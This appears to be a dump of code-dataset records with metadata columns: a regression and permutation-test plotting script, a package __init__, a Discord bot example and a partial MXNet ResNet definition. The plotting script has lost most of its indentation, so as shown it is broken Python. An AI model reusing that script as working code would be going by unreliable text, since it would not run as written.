df_selected.loc[:, "r_at_next_turn_event"] = df_selected["r_at_current_turn_event"].shift(-1).copy()
df_selected = df_selected.query("r_at_current_turn_event < 5.9 and r_at_previous_turn_event < 5.9 and r_at_next_turn_event < 5.9")
p0 = myfig.Plot(fig, num='b', xpos=10, ypos=ypos, plot_height=1.25, plot_width=2,
lw=1, pc='white', errorbar_area=False,
xl="Brightness", xmin=-5, xmax=181, xticks=[0, 90, 180],
yl="Absolute turn angle", ymin=-1, ymax=41, yticks=[0, 20, 40])
df_selected1 = df_selected.query("angle_change_at_current_turn_event < 41 and "
"angle_change_at_current_turn_event > -41 and "
"luminance_at_current_turn_event < 181")[["luminance_at_current_turn_event",
"angle_change_at_current_turn_event"]]
myfig.Scatter(p0, x=df_selected1["luminance_at_current_turn_event"],
y=df_selected1["angle_change_at_current_turn_event"].abs(),
lc=None, lw=0, pt='.', ps=1, pc=color, zorder=4, alpha=0.3)
bins = np.arange(0, 161, 40)
vals = []
for bin in bins:
df_ = df_selected1.query("luminance_at_current_turn_event < (@bin + 20) and luminance_at_current_turn_event > (@bin - 20)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
myfig.Scatter(p0, x=bins, y=vals, lw=0, pt='.', ps=12, pc=color, zorder=5)
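    # The binned medians above use centers every 40 luminance units with a
    # +/-20 window around each center, so adjacent windows touch at the edges
    # without overlapping (the strict < / > bounds keep the edges exclusive).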
X_median = np.array(bins).reshape(-1, 1)
Y_median = np.array(vals).reshape(-1, 1)
X_raw = np.array(df_selected1["luminance_at_current_turn_event"]).reshape(-1, 1)
Y_raw = np.array(df_selected1["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_median = LinearRegression() # create object for the class
reg_median = linear_regressor_median.fit(X_median, Y_median) # perform linear regression
Y_pred_median = linear_regressor_median.predict(X_median) # make predictions
real_R_median = reg_median.score(X_median, Y_median)
linear_regressor_raw = LinearRegression() # create object for the class
reg_raw = linear_regressor_raw.fit(X_raw, Y_raw) # perform linear regression
Y_pred_raw = linear_regressor_raw.predict(X_raw) # make predictions
real_R_raw = reg_raw.score(X_raw, Y_raw)
# Repeat this but with shuffled data
Rs_shuffled_raw = []
Rs_shuffled_median = []
for shuffle_i in range(1000):
df_selected_shuffled = df_selected1.apply(lambda df_selected1: df_selected1.sample(frac=1).values)
bins = np.arange(0, 161, 40)
vals = []
for bin in bins:
df_ = df_selected_shuffled.query(
"luminance_at_current_turn_event < (@bin + 20) and luminance_at_current_turn_event > (@bin - 20)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
X_shuffled_median = np.array(bins).reshape(-1, 1)
Y_shuffled_median = np.array(vals).reshape(-1, 1)
X_shuffled_raw = np.array(df_selected_shuffled["luminance_at_current_turn_event"]).reshape(-1, 1)
Y_shuffled_raw = np.array(df_selected_shuffled["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_shuffled_median = LinearRegression() # create object for the class
reg_shuffled_median = linear_regressor_shuffled_median.fit(X_shuffled_median, Y_shuffled_median) # perform linear regression
Y_pred_shuffled_median = linear_regressor_shuffled_median.predict(X_shuffled_median) # make predictions
real_R_shuffled_median = reg_shuffled_median.score(X_shuffled_median, Y_shuffled_median)
linear_regressor_shuffled_raw = LinearRegression() # create object for the class
reg_shuffled_raw = linear_regressor_shuffled_raw.fit(X_shuffled_raw, Y_shuffled_raw) # perform linear regression
Y_pred_shuffled_raw = linear_regressor_shuffled_raw.predict(X_shuffled_raw) # make predictions
        real_R_shuffled_raw = reg_shuffled_raw.score(X_shuffled_raw, Y_shuffled_raw)
Rs_shuffled_median.append(real_R_shuffled_median)
Rs_shuffled_raw.append(real_R_shuffled_raw)
Rs_shuffled_median = np.array(Rs_shuffled_median)
Rs_shuffled_raw = np.array(Rs_shuffled_raw)
p_median = np.sum(Rs_shuffled_median > real_R_median)/len(Rs_shuffled_median)
p_raw = np.sum(Rs_shuffled_raw > real_R_raw) / len(Rs_shuffled_raw)
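    # The shuffle loop above is a permutation test: each column is shuffled
    # independently to break the pairing, the regression is refit, and the
    # p-value is the fraction of shuffled fits whose R^2 beats the observed
    # one. A minimal standalone sketch of the same idea (hypothetical helper,
    # numpy/sklearn only):
    #     def permutation_p_value(X, Y, observed_r2, n_shuffles=1000):
    #         rs = []
    #         for _ in range(n_shuffles):
    #             Y_perm = np.random.permutation(Y)
    #             reg = LinearRegression().fit(X, Y_perm)
    #             rs.append(reg.score(X, Y_perm))
    #         return np.sum(np.array(rs) > observed_r2) / n_shuffles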
myfig.Line(p0, x=np.array([0, 180]),
y=reg_median.coef_[0][0]*np.array([0, 180]) + reg_median.intercept_[0],
lc=color, lw=0.5, zorder=6, label=f'R2 = {real_R_median:.3f}, p = {p_median:.3f}\ny = {reg_median.coef_[0][0]:.3f}*x + {reg_median.intercept_[0]:.2f}')
myfig.Line(p0, x=np.array([0, 180]),
y=reg_raw.coef_[0][0]*np.array([0, 180]) + reg_raw.intercept_[0],
lc=color, dashes=(2,2), lw=0.5, zorder=6, label=f'R2 = {real_R_raw:.3f}, p = {p_raw:.3f}\ny = {reg_raw.coef_[0][0]:.3f}*x + {reg_raw.intercept_[0]:.2f}')
#######
# The luminance change
p0 = myfig.Plot(fig, num='b', xpos=16, ypos=ypos, plot_height=1.25, plot_width=2,
lw=1, pc='white', errorbar_area=False,
xl="Brightness change\nsince previous turn", xmin=-65, xmax=65, xticks=[-60, -30, 0, 30, 60],
yl="Absolute turn angle", ymin=-1, ymax=41, yticks=[0, 20, 40])
df_selected1 = df_selected.query("luminance_change_since_previous_turn_event > -61 and "
"luminance_change_since_previous_turn_event < 61 and "
"angle_change_at_current_turn_event < 41 and "
"angle_change_at_current_turn_event > -41")[["luminance_change_since_previous_turn_event",
"angle_change_at_current_turn_event"]]
myfig.Scatter(p0, x=df_selected1["luminance_change_since_previous_turn_event"],
y=df_selected1["angle_change_at_current_turn_event"].abs(),
lc=None, lw=0, pt='.', ps=1, pc=color, zorder=4, alpha=0.3)
bins = np.arange(-60, 61, 30)
vals = []
for bin in bins:
df_ = df_selected1.query("luminance_change_since_previous_turn_event < (@bin + 15) and luminance_change_since_previous_turn_event > (@bin - 15)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
myfig.Scatter(p0, x=bins, y=vals, lw=0, pt='.', ps=12, pc=color, zorder=5)
X_median = np.array(bins).reshape(-1, 1)
Y_median = np.array(vals).reshape(-1, 1)
X_raw = np.array(df_selected1["luminance_change_since_previous_turn_event"]).reshape(-1, 1)
Y_raw = np.array(df_selected1["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_median = LinearRegression() # create object for the class
reg_median = linear_regressor_median.fit(X_median, Y_median) # perform linear regression
Y_pred_median = linear_regressor_median.predict(X_median) # make predictions
real_R_median = reg_median.score(X_median, Y_median)
linear_regressor_raw = LinearRegression() # create object for the class
reg_raw = linear_regressor_raw.fit(X_raw, Y_raw) # perform linear regression
Y_pred_raw = linear_regressor_raw.predict(X_raw) # make predictions
real_R_raw = reg_raw.score(X_raw, Y_raw)
# Repeat this but with shuffled data
Rs_shuffled_raw = []
Rs_shuffled_median = []
for shuffle_i in range(1000):
df_selected_shuffled = df_selected1.apply(lambda df_selected1: df_selected1.sample(frac=1).values)
bins = np.arange(-60, 61, 30)
vals = []
for bin in bins:
df_ = df_selected_shuffled.query("luminance_change_since_previous_turn_event < (@bin + 15) and luminance_change_since_previous_turn_event > (@bin - 15)")
vals.append(df_["angle_change_at_current_turn_event"].abs().median())
X_shuffled_median = np.array(bins).reshape(-1, 1)
Y_shuffled_median = np.array(vals).reshape(-1, 1)
X_shuffled_raw = np.array(df_selected_shuffled["luminance_change_since_previous_turn_event"]).reshape(-1, 1)
Y_shuffled_raw = np.array(df_selected_shuffled["angle_change_at_current_turn_event"].abs()).reshape(-1, 1)
linear_regressor_shuffled_median = LinearRegression() # create object for the class
reg_shuffled_median = linear_regressor_shuffled_median.fit(X_shuffled_median,
Y_shuffled_median) # perform linear regression
Y_pred_shuffled_median = linear_regressor_shuffled_median.predict(X_shuffled_median) # make predictions
real_R_shuffled_median = reg_shuffled_median.score(X_shuffled_median, Y_shuffled_median)
linear_regressor_shuffled_raw = LinearRegression() # create object for the class
reg_shuffled_raw = linear_regressor_shuffled_raw.fit(X_shuffled_raw,
Y_shuffled_raw) # perform linear regression
Y_pred_shuffled_raw = linear_regressor_shuffled_raw.predict(X_shuffled_raw) # make predictions
        real_R_shuffled_raw = reg_shuffled_raw.score(X_shuffled_raw, Y_shuffled_raw)
Rs_shuffled_median.append(real_R_shuffled_median)
Rs_shuffled_raw.append(real_R_shuffled_raw)
Rs_shuffled_median = np.array(Rs_shuffled_median)
Rs_shuffled_raw = np.array(Rs_shuffled_raw)
p_median = np.sum(Rs_shuffled_median > real_R_median) / len(Rs_shuffled_median)
p_raw = np.sum(Rs_shuffled_raw > real_R_raw) / len(Rs_shuffled_raw)
myfig.Line(p0, x=np.array([-61, 61]),
y=reg_median.coef_[0][0] * np.array([-61, 61]) + reg_median.intercept_[0],
lc='black', lw=0.5, zorder=6,
label=f'R2 = {real_R_median:.3f}, p = {p_median:.3f}\ny = {reg_median.coef_[0][0]:.3f}*x + {reg_median.intercept_[0]:.2f}')
myfig.Line(p0, x=np.array([-61, 61]),
y=reg_raw.coef_[0][0] * np.array([-61, 61]) + reg_raw.intercept_[0],
lc='black', dashes=(2, 2), lw=0.5, zorder=6,
label=f'R2 = {real_R_raw:.3f}, p = {p_raw:.3f}\ny = {reg_raw.coef_[0][0]:.3f}*x + {reg_raw.intercept_[0]:.2f}')
fig.savepdf(root_path / f"figure2_model_profile1", open_pdf=True) | 55.420225 | 234 | 0.629957 | 3,688 | 24,662 | 3.933297 | 0.077278 | 0.051496 | 0.054047 | 0.05708 | 0.898938 | 0.871295 | 0.83462 | 0.800221 | 0.775059 | 0.767958 | 0 | 0.059317 | 0.226178 | 24,662 | 445 | 235 | 55.420225 | 0.700744 | 0.051902 | 0 | 0.490446 | 0 | 0.012739 | 0.243949 | 0.142396 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022293 | 0 | 0.022293 | 0.006369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b0ce5a490a04b990f270b040b32dc932b4140c9 | 181 | py | Python | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | 3 | 2017-09-19T10:38:50.000Z | 2019-10-07T03:47:02.000Z | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | null | null | null | main/pcse/crop/nutrients/__init__.py | jajberni/pcse_web | 284b35270061fee61040f41df419cbf9eea32a2e | [
"Apache-2.0"
] | 1 | 2019-10-31T01:11:06.000Z | 2019-10-31T01:11:06.000Z | from .npk_stress import NPK_Stress
from .npk_demand_uptake import NPK_Demand_Uptake
from .npk_translocation import NPK_Translocation
from .npk_soil_dynamics import NPK_Soil_Dynamics | 45.25 | 48 | 0.895028 | 28 | 181 | 5.357143 | 0.321429 | 0.186667 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082873 | 181 | 4 | 49 | 45.25 | 0.903614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d99ec45fe2e564b1d9b99285f9bce968bca3dee1 | 1,130 | py | Python | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | 1 | 2021-01-27T14:55:03.000Z | 2021-01-27T14:55:03.000Z | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | null | null | null | examples/example_without_CommandSet/my_commands.py | LeConstellationniste/DiscordFramework | 24d4b9b7cb0a21d3cec9d5362ab0828c5e15a3af | [
"CC0-1.0"
] | null | null | null | import asyncio
import discord
# Plain coroutine functions that can be added to the bot
async def hello(message):
await message.channel.send(f"Hello {message.author.mention}!", reference=message.to_reference())
async def admin(message):
await message.channel.send(f"Hello {message.author.mention}! You are administrator!", reference=message.to_reference())
async def product(message, a: int, b: int):
await message.channel.send(f"`{a}*{b} = {a*b}`", reference=message.to_reference())
# Or Command objects created from the same functions
from discordEasy.objects import Command, CommandAdmin
async def hello(message):
await message.channel.send(f"Hello {message.author.mention}!", reference=message.to_reference())
async def admin(message):
await message.channel.send(f"Hello {message.author.mention}! You are administrator!", reference=message.to_reference())
async def product(message, a: int, b: int):
await message.channel.send(f"`{a}*{b} = {a*b}`", reference=message.to_reference())
cmd_hello = Command(hello, name="Hello", aliases=("hello", "Hi", "hi"))
cmd_admin = CommandAdmin(admin, name="Admin")
cmd_product = Command(product, name="Product") | 36.451613 | 120 | 0.746903 | 161 | 1,130 | 5.186335 | 0.254658 | 0.057485 | 0.136527 | 0.165269 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0.708982 | 0 | 0 | 0.1 | 1,130 | 31 | 121 | 36.451613 | 0.821042 | 0.060177 | 0 | 0.666667 | 0 | 0 | 0.216981 | 0.09434 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
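# A hypothetical registration sketch. The exact Bot API of discordEasy is not
# shown in this file, so the names below (Bot, prefix, add_commands, run) are
# assumptions for illustration only:
#     from discordEasy import Bot
#     bot = Bot(prefix='!', token='YOUR_TOKEN')
#     bot.add_commands([cmd_hello, cmd_admin, cmd_product])
#     bot.run()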
d9a34cde8f8fd485bd0bfabaa246df7d01603a41 | 32,869 | py | Python | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | 4 | 2020-05-14T03:10:17.000Z | 2021-07-07T03:10:22.000Z | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | null | null | null | recognition/symbol/fresnet.py | zzdang/match_fashion | fb08b2f42d382a947b40bf197def85ea9ddd26af | [
"MIT"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''
Adapted from https://github.com/tornadomeet/ResNet/blob/master/symbol_resnet.py
Original author Wei Wu
Implemented the following paper:
Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun. "Identity Mappings in Deep Residual Networks"
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import mxnet as mx
import numpy as np
import symbol_utils
import memonger
import sklearn
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from sample_config import config
def Conv(**kwargs):
#name = kwargs.get('name')
#_weight = mx.symbol.Variable(name+'_weight')
#_bias = mx.symbol.Variable(name+'_bias', lr_mult=2.0, wd_mult=0.0)
#body = mx.sym.Convolution(weight = _weight, bias = _bias, **kwargs)
body = mx.sym.Convolution(**kwargs)
return body
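# Conv is a thin wrapper around mx.sym.Convolution; the commented lines above
# mark where custom weight/bias Variables (e.g. with per-parameter lr_mult or
# wd_mult) could be attached if that is ever needed.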
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def residual_unit_v1(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit1')
if bottle_neck:
conv1 = Conv(data=data, num_filter=int(num_filter*0.25), kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
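            # The SE block above: global average pooling squeezes the spatial
            # dimensions, two 1x1 convolutions with a 16x channel reduction
            # produce per-channel gates in (0, 1) via the sigmoid, and
            # broadcast_mul rescales the residual branch channel-wise
            # (Squeeze-and-Excitation).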
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn3 + shortcut, act_type=act_type, name=name + '_relu3')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn2 = mx.symbol.broadcast_mul(bn2, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn2 + shortcut, act_type=act_type, name=name + '_relu3')
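# Usage sketch for the unit above (a minimal, hypothetical example of calling
# the unit directly; all names here are illustrative):
#     data = mx.sym.Variable('data')
#     unit = residual_unit_v1(data, num_filter=64, stride=(2, 2),
#                             dim_match=False, name='stage1_unit1',
#                             bottle_neck=False, version_se=0, bn_mom=0.9,
#                             workspace=256, memonger=False, version_act='prelu')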
def residual_unit_v1_L(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit1')
if bottle_neck:
conv1 = Conv(data=data, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv3 = Conv(data=act2, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
bn3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn3 = mx.symbol.broadcast_mul(bn3, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn3 + shortcut, act_type=act_type, name=name + '_relu3')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv2 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn2 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
if use_se:
#se begin
body = mx.sym.Pooling(data=bn2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
bn2 = mx.symbol.broadcast_mul(bn2, body)
#se end
if dim_match:
shortcut = data
else:
conv1sc = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_conv1sc')
shortcut = mx.sym.BatchNorm(data=conv1sc, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return Act(data=bn2 + shortcut, act_type=act_type, name=name + '_relu3')
def residual_unit_v2(data, num_filter, stride, dim_match, name, bottle_neck, **kwargs):
"""Return ResNet Unit symbol for building ResNet
Parameters
----------
data : str
Input data
num_filter : int
Number of output channels
bnf : int
Bottle neck channels factor with regard to num_filter
stride : tuple
Stride used in convolution
dim_match : Boolean
True means channel number between input and output is the same, otherwise means differ
name : str
Base name of the operators
workspace : int
Workspace used in convolution operator
"""
use_se = kwargs.get('version_se', 1)
bn_mom = kwargs.get('bn_mom', 0.9)
workspace = kwargs.get('workspace', 256)
memonger = kwargs.get('memonger', False)
act_type = kwargs.get('version_act', 'prelu')
#print('in unit2')
if bottle_neck:
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.25), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
act3 = Act(data=bn3, act_type=act_type, name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
if use_se:
#se begin
body = mx.sym.Pooling(data=conv3, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
body = mx.symbol.Activation(data=body, act_type='sigmoid', name=name+"_se_sigmoid")
conv3 = mx.symbol.broadcast_mul(conv3, body)
if dim_match:
shortcut = data
else:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
else:
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn1')
act1 = Act(data=bn1, act_type=act_type, name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=stride, pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1')
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
act2 = Act(data=bn2, act_type=act_type, name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
if use_se:
#se begin
body = mx.sym.Pooling(data=conv2, global_pool=True, kernel=(7, 7), pool_type='avg', name=name+'_se_pool1')
body = Conv(data=body, num_filter=num_filter//16, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv1", workspace=workspace)
body = Act(data=body, act_type=act_type, name=name+'_se_relu1')
body = Conv(data=body, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
name=name+"_se_conv2", workspace=workspace)
